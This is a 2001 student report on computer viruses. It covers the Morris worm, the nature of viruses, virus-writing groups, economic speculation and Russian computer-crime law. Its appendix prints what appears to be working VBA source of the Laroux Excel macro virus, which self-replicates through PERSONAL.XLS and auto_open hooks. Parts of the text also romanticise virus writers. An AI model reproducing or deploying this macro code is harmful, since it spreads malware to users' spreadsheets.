Computer viruses

Computer viruses

Chuvash State University

Economic faculty

Report

COMPUTER VIRUSES

Author:

student of EC-13-98

Eugene Ivanov

Cheboxary – 2001

CONTENTS

A bit of history 3

What is a computer virus? 4

Who writes computer viruses? 5

To whose advantage computer viruses are written? 6

A legal notice. Penal Code of Russian Federation 7

Synopsis 8

SOURCES 9

Appendix 10

A bit of history

2 November 1988 Robert Morris younger (Robert Morris), graduate student

of informatics faculty of Cornwall University (USA) infected a great amount

of computers, connected to Internet network. This network unites machines

of university centres, private companies and governmental agents, including

National Aeronautics Space Administration, as well as some military

scientific centres and labs.

Network worm has struck 6200 machines that formed 7,3% computers to

network, and has shown, that UNIX not okay too. Amongst damaged were NASA,

LosAlamos National Lab, exploratory centre VMS USA, California Technology

Institute, and Wisconsin University (200 from 300 systems). Spread on

networks ApraNet, MilNet, Science Internet, NSF Net it practically has

removed these network from building. According to "Wall Street Journal",

virus has infiltrated networks in Europe and Australia, where there were

also registered events of blocking the computers.

Here are some recalls of the event participants:

Symptom: hundreds or thousands of jobs start running on a Unix system

bringing response to zero.

Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.: SUNs) any

sendmail compiled with debug has this problem. This virus is spreading very

quickly over the Milnet. Within the past 4 hours, it has hit >10 sites

across the country, both Arpanet and Milnet sites. Well over 50 sites have

been hit. Most of these are "major" sites and gateways.

Method: Someone has written a program that uses a hole in SMTP Sendmail

utility. This utility can send a message into another program.

Apparently what the attacker did was this: he or she connected to

sendmail (i.e., telnet victim.machine 25), issued the appropriate debug

command, and had a small C program compiled. (We have it. Big deal.) This

program took as an argument a host number, and copied two programs – one

ending in VAX.OS and the other ending in SunOS – and tried to load and

execute them. In those cases where the load and execution succeeded, the

worm did two things (at least): spawn a lot of shells that did nothing but

clog the process table and burn CPU cycles; look in two places – the

password file and the internet services file – for other sites it could

connect to (this is hearsay, but I don't doubt it for a minute). It used

both individual .host files (which it found using the password file), and

any other remote hosts it could locate which it had a chance of connecting

to. It may have done more; one of our machines had a changed superuser

password, but because of other factors we're not sure this worm did it.

All of Vaxen and some of Suns here were infected with the virus. The

virus forks repeated copies of itself as it tries to spread itself, and the

load averages on the infected machines skyrocketed. In fact, it got to the

point that some of the machines ran out of swap space and kernel table

entries, preventing login to even see what was going on!

The virus also "cleans" up after itself. If you reboot an infected

machine (or it crashes), the /tmp directory is normally cleaned up on

reboot. The other incriminating files were already deleted by the virus

itself.

4 November the author of the virus – Morris – come to FBI headquarters in

Washington on his own. FBI has imposed a prohibition on all material

relating to the Morris virus.

22 January 1989 a court of jurors has acknowledged Morris guilty. If

denunciatory verdict had been approved without modification, Morris would

have been sentenced to 5 years of prison and 250 000 dollars of fine.

However Morris' attorney Thomas Guidoboni immediately has lodged a protest

and has directed all papers to the Circuit Court with the petition to

decline the decision of court... Finally Morris was sentenced to 3 months

of prisons and fine of 270 thousand dollars, but in addition Cornwall

University carried a heavy loss, having excluded Morris from its members.

Author then had to take part in liquidation of its own creation.

What is a computer virus?

It is an executable code able to reproduce itself. Viruses are an area of

pure programming, and, unlike other computer programs, carry intellectual

functions on protection from being found and destroyed. They have to fight

for survival in complex conditions of conflicting computer systems. That's

why they evolve as if they were alive.

Yes, viruses seem to be the only alive organisms in the computer

environment, and yet another their main goal is survival. That is why they

may have complex crypting/decrypting engines, which is indeed a sort of a

standard for computer viruses nowadays, in order to carry out processes of

duplicating, adaptation and disguise

It is necessary to differentiate between reproducing programs and Trojan

horses. Reproducing programs will not necessarily harm your system because

they are aimed at producing as many copies (or somewhat-copies) of their

own as possible by means of so-called agent programs or without their help.

In the later case they are referred to as "worms".

Meanwhile Trojan horses are programs aimed at causing harm or damage to

PC's. Certainly it's a usual practice, when they are part of "tech-

organism", but they have completely different functions.

That is an important point. Destructive actions are not an integral part

of the virus by default. However virus-writers allow presence of

destructive mechanisms as an active protection from finding and destroying

their creatures, as well as a response to the attitude of society to

viruses and their authors.

As you see, there are different types of viruses, and they have already

been separated into >

harmless, and very dangerous. No destruction means a harmless one, tricks

with system halts means a dangerous one, and finally with a devastating

destruction means a very dangerous virus.

But viruses are famous not only for their destructive actions, but also

for their special effects, which are almost impossible to >

virus-writers suggest the following:

funny, very funny and sad or melancholy (keeps silence and infects). But

one should remember that special effects must occur only after a certain

number of contaminations. Users should also be given a chance to restrict

execution of destructive actions, such as deleting files, formatting hard

disks. Thereby virus can be considered to be a useful program, keeping a

check on system changes and preventing any surprises such as of deletion of

files or wiping out hard disks.

It sounds quite heretical to say such words about viruses, which are

usually considered to be a disaster. The less person understands in

programming and virology, the greater influence will have on him

possibility of being infected with a virus. Thus, let's consider creators

of viruses as the best source.

Who writes computer viruses?

They are lone wolves or programmers groups.

In spite of the fact that a lot of people think, that to write a computer

virus is a hardship, it is no exactly so. Using special programs called

"Virus creators" even beginners in computer world can build their own

viruses, which will be a strain of a certain major virus. This is precisely

the case with notorious virus "Anna Curnikova", which is actually a worm.

The aim of creation of viruses in such way is pretty obvious: the author

wants to become well known all over the world and to show his powers.

Somehow, the results of the attempt can be very sad (see a bit of

history), only real professionals can go famous and stay uncaught. A good

example is Dark Avenger. Yes, and it's yet another custom of participants

of "the scene" – to take terrifying monikers (nicknames).

To write something really new and remarkable programmer should have some

extra knowledge and skills, for example:

1) good strategic thinking and intuition – releasing a virus and its

descendants live their own independent life in nearly unpredictable

conditions. Therefore the author must anticipate a lot of things;

2) splendid knowledge of language of the Assembler[1] and the operating

system he writes for – the more there are mistakes in the virus the

quicker its will be caught;

3) attention to details and a skill to solve the most varied tactical

questions – one won't write a compact, satisfactory working program

without this abilities;

4) a high professional discipline in order to join preceding points

together.

A computer virus group is an informal non-profit organisation, uniting

programmers–authors of viruses regardless of their qualifications. Everyone

can become a member of the club, if he creates viruses, studies them for

the reason of creation and spreading.

The aims they pursue together may differ from that of a single virus

writer, although they usually also try to become as famous as possible. But

in the same time they may render help to beginning programmers in the field

of viruses and spread commented sources of viruses and virus algorithm

descriptions.

One can't say that all of the group members write viruses in Assembler.

Actually, you don't have to know any computer language or write any program

code to become a member or a friend of the group. But programming in

Assembler is preferred, Pascal, C++ and other high level languages are

considered to be humiliating. It does make sense since programs compiled in

Assembler are much smaller (0.5-5 kb) and therefore more robust. On the

other hand Assembler is quite difficult to understand especially for

beginners. One should think in the way computer does: all commands are send

directly to the central processing unit of PC.

There are computer virus groups all over the world, few being more

successful than others. It may be pretty hard to get in contact with them

since they are quite typical representatives of computer underground world

as well as (free)wares groups. Sometimes, however, creating viruses can

become a respectable occupation, bringing constant income. After all, no

one but the author of the virus can bring valuable information on the way

it should be treated and cured.

To whose advantage computer viruses are written?

Copyleft (cl) is distribution of programs without registering the

software, i.e. using a cracked copy. The practice is widely used in the

territory of former USSR even by medium and big companies, to say nothing

of ordinary users. This software is stolen, which involves criminal

responsibility (see legal notice). One of the general valuables of our

culture is a generosity, and you can't do anything about it. But at least

freeware lovers should know that proceeding with the practice could be

risky. That's the first use of computer viruses – as a sort of compensation

to software developers.

In the very same way writing viruses usually does not bring profits to

the author. At least when the authors of a virus and a cure to it are

different persons. The situation is quite different when they are not,

especially if the person manages to hide the fact of the double-dealing.

And that is the second advantage of computer viruses.

Yes, developers of antiviral software gain money from selling their

remedy to a new widely hyped by the mass media virus. Agitation can grow so

strong that all and everyone dash to buy an antiviral protection against

even a most harmless virus. The ordinal behaviour of share indexes in stock

exchanges while a computer virus epidemic is to fall. Somehow, the shares

of such companies as Symantec (which is famous for its Norton Antivirus)

will soar up to the sky.

The tendency is especially significant in the world of emerging New

Economy. This fancy word means an economy, based on computer services as

the engine of the development. The system takes place in the United States.

That is why we hardly ever hear the names of Dow Jones and Standard &

Poor's in the mass media nowadays. Their place is occupied by NASDAQ

Composite index, based on the National Association of Securities Dealers

Automated Quotations system. The index is responsible for the performance

of high-tech companies, the base of the New Economy.

We can't say for sure, but maybe in the nearest future the index will be

influenced more by computers themselves, than brokers and dealers in the

world stock exchanges. IBM Corporation has recently presented its new

invention – an automated broker, which is indeed a mainframe (a very big

computer) with specialised software. It is a descendant of mainframe

DeepBlue, well known for its skills in chess field. Unfortunately, it seems

that bad times have come for the whole economy of the USA, which also means

problems for NASDAQ.

Nevertheless the initiative of IBM should certainly be greeted. Automated

brokers seem to understand the volatility of indexes in a much quicker and

rational way than human beings. There is an only drawback to eliminate –

the problem of artificial intellect. Machine can't think as a human.

Maybe computer viruses could be of any use here too. After all, the

flights to the Moon become a simple effect of inventing the new ways of

civil population extermination during the Second World War (ballistic

rockets). A wish to kill people did a fantastic daydream become reality

within fifty years. The first computing machine was actively used while the

first atomic bomb development. So sometimes even very bad, much more

dangerous than viruses (name at least one person being victim of a cruel

computer virus), can highly assist to the progress and bring a greater

profit.

A legal notice. Penal Code of Russian Federation

Chapter 28. Crimes in sphere of computer information

Article 272. Illegitimate access to computer information

1. Illegitimate access to a law-protected computer information, i.e.

information on the machine carrier, in electronic-computing machine (PC),

PC system or its network, if it causes a destruction, blocking,

modification or copying of information, breach of work PC, PC systems or

its network, –

is punished by fine in the size from two to five hundred minimum sizes of

labour payment, or in the size of salary/other profit of the convicted for

a period from two to five months, or by corrective works for a period from

six months to one year, or by deprivation of liberty for a term up to two

years.

2. Same deed, performed by a group of persons on the preliminary

collusion or by an organised group or a person using their official

position, as well as having access to PC, PC system or to its network, –

is punished by fine in the size from five to eight hundred minimum sizes

of labour payment, or in the size of salary/other profit of the convicted

for a period from five to eight months, or by corrective works for a period

from one to two years, or by arrest for a period from three to six months,

or by deprivation of liberty for a term up to two years.

Article 273. Creation, use and spreading harmful programs for PC.

1. Making the programs for PC or a contributing the changes to exist

programs, undoubtedly bringing about unauthorised deleting, blocking,

modification, or copying information, breaking of PC functionality, PC

systems or its network, as well as use or spreading of such programs or

machine carriers with such programs –

is punished by deprivation of liberty for a term up to three years with

the fine in the amount between two and five hundred minimum amounts of

labour payment, or in the amount of salary/other profit of the convicted

for a period from two five months.

2. The same deeds having caused on indiscretion heavy consequences, –

are punished by the deprivation of liberty for a term from three to seven

years.

Synopsis

The history of computer viruses has begun recently, but it has already

become legendary. Almost everyone knows a few awesome fables about these

creatures, but hardy anyone understands what computer virus is.

Computer virus is an executable code able to reproduce itself. Viruses

are an area of pure programming, and, unlike other computer programs, carry

intellectual functions on protection from being found and destroyed. They

have to fight for survival in complex conditions of conflicting computer

systems.

Viruses seem to be the only alive organisms in the computer environment,

and yet another their main goal is survival. That is why they may have

complex crypting/decrypting engines, which is indeed a sort of a standard

for computer viruses nowadays, in order to carry out processes of

duplicating, adaptation and disguise

Viruses are written by lone wolves or programmers groups.

Using special programs called "Virus creators" even beginners in computer

world can build their own viruses. The aim of creation of viruses in such

way is pretty obvious: the author wants to become well known all over the

world and to show his powers.

The results of the attempt can be very sad, only real professionals can

go famous and stay uncaught. To write something really new and remarkable

programmer should have some extra knowledge and skills.

A computer virus group is an informal non-profit organisation, uniting

programmers–authors of viruses regardless of their qualifications. Everyone

can become a member of the club, if he creates viruses, studies them for

the reason of creation and spreading. You don't have to know any computer

language or write any program code to become a member or a friend of the

group. Programming in Assembler is preferred, Pascal, C++ and other high

level languages are considered to be humiliating

There are computer virus groups all over the world, few being more

successful than others. It may be pretty hard to get in contact with them

since they are quite typical representatives of computer underground world

as well as (free)wares groups. Sometimes, however, creating viruses can

become a respectable occupation, bringing constant income. After all, no

one but the author of the virus can bring valuable information on the way

it should be treated and cured.

Developers of antiviral software gain money from selling their remedy to

a new widely hyped by the mass media virus. Agitation can grow so strong

that all and everyone dash to buy an antiviral protection against even a

most harmless virus. The ordinal behaviour of share indexes in stock

exchanges while a computer virus epidemic is to fall. Somehow, the shares

of high-tech companies producing antiviral software will soar up to the

sky.

An epidemic of foot-and-mouth disease has overwhelmed Europe in these

days (March 15, 2001). It seems that a vast economic crisis is breaking out

in America. World finances make their best to escape the worst.

A break-through in the sphere of artificial intellect development could

prevent NASDAQ from complete falling down. The help may come from an

unexpected side...

But don't forget that creation, use and spreading harmful programs for PC

is a criminal offence, as well as using cracked versions of programs. Our

penal code establishes a punishment up to seven years of jail.

And be aware that computer viruses came for a long time, unless forever.

SOURCES

1. Penal Code of Russian Federation

2. Handless N.N. Computer virology. Part 1: General principles of

operation, categorization and catalogue of the most widespread viruses in

operating system MS DOS. – Kiev, 1990.

3. Infected Voice. Issue 1, September, 1994. – STEALTH group.

4. Infected Voice. Issue 2, October, 1994. – STEALTH group.

5. Infected Voice. Issue 3. December, 1994. – STEALTH group.

Appendix

An fragment of a macrovirus (Laroux), written in a high-level computer

language (ExelVisualBasic)

Attribute VB_Name = "laroux"

Sub auto_open()

Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"

Application.OnSheetActivate = "check_files"

End Sub

Sub check_files()

Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"

c$ = Application.StartupPath

m$ = Dir(c$ & "\" & "PERSONAL.XLS")

If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0

If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0

whichfile = p + w * 10

Select Case whichfile

Case 10

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

Sheets("laroux").Visible = True

Sheets("laroux").Select

Sheets("laroux").Copy

With ActiveWorkbook

.Title = ""

.Subject = ""

.Author = ""

.Keywords = ""

.Comments = ""

End With

newname$ = ActiveWorkbook.Name

c4$ = CurDir()

ChDir Application.StartupPath

ActiveWindow.Visible = False

Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" &

"PERSONAL.XLS", FileFormat:=xlNormal _

, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _

False, CreateBackup:=False

ChDir c4$

Workbooks(n4$).Sheets("laroux").Visible = False

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "personal.xls!check_files"

Case 1

Application.ScreenUpdating = False

n4$ = ActiveWorkbook.Name

p4$ = ActiveWorkbook.Path

s$ = Workbooks(n4$).Sheets(1).Name

If s$ <> "laroux" Then

Workbooks("PERSONAL.XLS").Sheets("laroux").Copy

before:=Workbooks(n4$).Sheets(1)

Workbooks(n4$).Sheets("laroux").Visible = False

Else

End If

Application.OnSheetActivate = ""

Application.ScreenUpdating = True

Application.OnSheetActivate = "personal.xls!check_files"

Case Else

End Select

End Sub

-----------------------

[1] Assembler - a low level, hardware- oriented computer language